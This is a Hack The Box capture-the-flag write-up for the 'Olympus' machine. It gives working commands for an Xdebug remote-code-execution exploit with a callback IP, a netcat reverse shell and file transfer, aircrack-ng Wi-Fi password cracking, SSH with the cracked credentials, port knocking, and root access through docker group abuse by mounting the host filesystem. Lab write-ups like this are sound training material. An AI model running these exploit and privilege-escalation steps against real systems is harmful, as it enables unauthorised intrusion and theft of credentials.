HTB Olympus (Medium) - Writeup
Difficulty: Medium
Olympus was a well-designed box involving DNS exploitation and Wi-Fi cracking, with containerization playing a key role throughout the journey.
Privilege escalation was achieved through a misconfiguration, making for a solid and enjoyable challenge.
—
Nmap
The nmap scan revealed three open and one filtered port:
Port 53 - DNS
We can try to look for hidden domain names with dig command:
dig axfr @10.10.10.83 olympus.htb
dig @10.10.10.83 olympus.htb
Domain name olympus.htb was just my guess based on HTB naming convention.
Port 80 - Website
It doesn’t contain anything intresting, also feroxbuster didn’t found anything.
Let’s take a look at the http response headers.
Xdebug looks promising, lets research it a bit.
It turns out that xdebug is a php tool and 2.5.5 is a version.
After a quick search I found an RCE exploit for this tool.
https://github.com/vulhub/vulhub/blob/master/php/xdebug-rce/exp.py
Let’s try to get basic code execution with it:
python3 exp.py -t http://10.10.10.83/index.php -c 'shell_exec("id");' --dbgp-ip 10.10.14.14
It worked, now we can try to get a shell access, I’ll try netcat shell first.
We will start netcat listener on port 9005 and run:
We were lucky, it turned out that our target had netcat with -e option installed which led to initial access.
After a quick enumeration we see that it is likely a container, hostname is weird, and ip differs from the original one.
Also python is not installed meaning we can’t upgrade a terminal.
After some enumeration we found .cap file, it 100% might contain something intresting.
We will move this file with netcat, first we will start a listener on kali:
and then run netcat on the target machine:
Wireshark - .cap Analysis
Now we can open this file with wireshark:
It is a file containing traffic captured from the 802.11 protocol, which is the standard used for wireless Wi-Fi communication.
Manually analyzing this file wouldn’t be required here.
We will use a tool called aircrack-ng to get wi-fi password.
aircrack-ng file.cap -w /usr/share/wordlists/rockyou.txt
We have found a key “flightoficarus”.
Network name is “Too_cl0se_to_th3_Sun”.
ssh shell as icarus
Combining these two informations and after some tries we found ssh access as “icarus” with password “Too_cl0se_to_th3_Sun”.
Notice we specified port 2222, because it was the open port for ssh on this machine.
After some enumeration we found:
Now we need to go back to port 53 enumeration with this domain name.
Back to port 53 - DNS
With new domain name we can try to perform zone transfer as port 53 is open.
It had a dns TXT record saying:
"prometheus, open a temporal portal to Hades (3456 8234 62431) and St34l_th3_F1re!"
It looks like a password and numbers used for port knocking.
port knocking is a mechanism used to protect netowork services.
With a proper combination of three numbers we can “knock” a port to temporarily open it.
Port 22 came from nmap as “filtered”. We can try to knock it.
The username was discovered by analyzing a DNS TXT record and recognizing the naming pattern based on Greek gods used in previous accounts.
Abusing docker to get root
Again quick enumeration led to basic founding.
We’re in “docker” group which allows us to run docker commands.
We can start with enumerating running docker containers.
There are three containers. I believe we have to use “rhodes” because this is the only hostname I haven’t seen before on this machine.
We can try to abuse it with this command:
docker run -v /:/mountedroot -i -t rodhes bash
Command Explanation
docker run –> Starts a new Docker container.
-v /:/mountedroot –> Mounts the host’s root filesystem / into the container at the path /mountedroot
-i –> Runs the container in interactive mode.
-t –> Allocates a pseudo-TTY
rodhes –> The name of the Docker image used to create the container.
bash –> The command to run inside the container.
Retrieving a flag
We mounted / to /mountedroot
Meaning flag will be located in /mountedroot/root/root.txt
Thank you for reading!